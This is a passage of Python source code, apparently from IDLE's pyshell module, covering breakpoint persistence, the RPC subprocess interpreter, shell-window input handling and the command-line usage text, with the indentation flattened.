("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.CurrentTheme()
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
except OSError:
lines = []
try:
with open(self.breakpointPath, "w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except OSError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.CurrentTheme()
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
def restart_line(width, filename): # See bpo-38141.
"""Return width long restart line formatted with filename.
Fill line with balanced '='s, with any extras and at least one at
the beginning. Do not end with a trailing space.
"""
tag = f"= RESTART: {filename or 'Shell'} ="
if width >= len(tag):
div, mod = divmod((width -len(tag)), 2)
return f"{(div+mod)*'='}{tag}{div*'='}"
else:
return tag[:-2] # Remove ' ='.
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcsubproc = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
self.rpcsubproc = subprocess.Popen(self.subprocess_arglist)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
return [sys.executable] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except OSError:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False, filename=''):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
debugger_r.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.terminate_subprocess()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
console.write('\n')
console.write(restart_line(console.width, filename))
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
if not filename:
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
debugger_r.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.listening_sock.close()
except AttributeError: # no socket
pass
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.terminate_subprocess()
self.tkconsole.executing = False
self.rpcclt = None
def terminate_subprocess(self):
"Make sure subprocess is terminated"
try:
self.rpcsubproc.kill()
except OSError:
# process already terminated
return
else:
try:
self.rpcsubproc.wait()
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, OSError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "pyshell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import debugobj_r
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = debugobj_r.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.tree import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.CurrentTheme()
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
with tokenize.open(filename) as fp:
source = fp.read()
if use_subprocess:
source = (f"__file__ = r'''{os.path.abspath(filename)}'''\n"
+ source + "\ndel __file__")
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
# at the moment, InteractiveInterpreter expects str
assert isinstance(source, str)
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Override Interactive Interpreter method: Use Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
tkconsole = self.tkconsole
text = tkconsole.text
text.tag_remove("ERROR", "1.0", "end")
type, value, tb = sys.exc_info()
msg = getattr(value, 'msg', '') or value or "<no detail available>"
lineno = getattr(value, 'lineno', '') or 1
offset = getattr(value, 'offset', '') or 0
if offset == 0:
lineno += 1 #mark end of offending line
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
tkconsole.colorize_syntax_error(text, pos)
tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % msg)
tkconsole.showprompt()
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in list(c.keys()):
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec(code, self.locals)
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.restart_subprocess()
self.checklinecache()
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec(code, self.locals)
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
parent=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
return self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
parent=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Connection Error",
"IDLE's subprocess didn't make connection.\n"
"See the 'Startup failure' section of the IDLE doc, online at\n"
"https://docs.python.org/3/library/idle.html#startup-failure",
parent=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
parent=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "IDLE Shell " + python_version()
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("window", "_Window"),
("help", "_Help"),
]
# Extend right-click context menu
rmenu_specs = OutputWindow.rmenu_specs + [
("Squeeze", "<<squeeze-current-text>>"),
]
allow_line_numbers = False
# New classes
from idlelib.history import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
OutputWindow.__init__(self, flist, None, None)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.sys_ps1 = sys.ps1 if hasattr(sys, 'ps1') else '>>> '
self.prompt_last_line = self.sys_ps1.split('\n')[-1]
self.prompt = self.sys_ps1 # Changes when debug active
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
squeezer = self.Squeezer(self)
text.bind("<<squeeze-current-text>>",
squeezer.squeeze_current_text_event)
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import iomenu
self.stdin = StdInputFile(self, "stdin",
iomenu.encoding, iomenu.errors)
self.stdout = StdOutputFile(self, "stdout",
iomenu.encoding, iomenu.errors)
self.stderr = StdOutputFile(self, "stderr",
iomenu.encoding, "backslashreplace")
self.console = StdOutputFile(self, "console",
iomenu.encoding, iomenu.errors)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
try:
# page help() text to shell.
import pydoc # import must be done here to capture i/o rebinding.
# XXX KBK 27Dec07 use text viewer someday, but must work w/o subproc
pydoc.pager = pydoc.plainpager
except:
sys.stderr = sys.__stderr__
raise
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
parent=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
debugger_r.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
self.prompt = self.sys_ps1
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = debugger_r.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
self.prompt = "[DEBUG ON]\n" + self.sys_ps1
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = True
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = False
self.canceled = False
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"Your program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "help", "copyright", "credits" or "license()" for more information.'
def begin(self):
self.text.mark_set("iomark", "insert")
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = ("==== No Subprocess ====\n\n" +
"WARNING: Running IDLE without a Subprocess is deprecated\n" +
"and will be removed in a later version. See Help/IDLE Help\n" +
"for details.\n\n")
sys.displayhook = rpc.displayhook
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.text.focus_force()
self.showprompt()
# User code should use separate default Tk root window
import tkinter
tkinter._support_default_root = True
tkinter._default_root = None
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = True
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
self.resetoutput()
if self.canceled:
self.canceled = False
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = False
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = False
self.canceled = True
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = False
self.endoffile = True
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
parent=self.text)
return
from idlelib.stackviewer import StackBrowser
StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
self.console.write(self.prompt)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def show_warning(self, msg):
width = self.interp.tkconsole.width
wrapper = TextWrapper(width=width, tabsize=8, expand_tabs=True)
wrapped_msg = '\n'.join(wrapper.wrap(msg))
if not wrapped_msg.endswith('\n'):
wrapped_msg += '\n'
self.per.bottom.insert("iomark linestart", wrapped_msg, "stderr")
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
self.ctip.remove_calltip_window()
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
count = OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
raise ###pass # ### 11Aug07 KBK if we are expecting exceptions
# let's find out what they are and be specific.
if self.canceled:
self.canceled = False
if not use_subprocess:
raise KeyboardInterrupt
return count
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super().rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert','<','iomark'):
return 'disabled'
return super().rmenu_check_paste()
def fix_x11_paste(root):
"Make paste replace selection on x11. See issue #5124."
if root._windowingsystem == 'x11':
for cls in 'Text', 'Entry', 'Spinbox':
root.bind_class(
cls,
'<<Paste>>',
'catch {%W delete sel.first sel.last}\n' +
root.bind_class(cls, '<<Paste>>'))
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (DEPRECATED,
see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print(sys.argv)" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
